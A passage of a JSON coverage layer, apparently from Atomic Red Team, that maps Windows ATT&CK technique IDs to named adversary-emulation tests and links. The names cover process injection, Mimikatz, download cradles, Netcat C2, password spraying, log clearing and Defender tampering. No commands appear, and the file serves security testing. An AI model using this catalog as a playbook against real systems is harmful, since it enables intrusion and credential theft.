Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic 
script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm 
Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View 
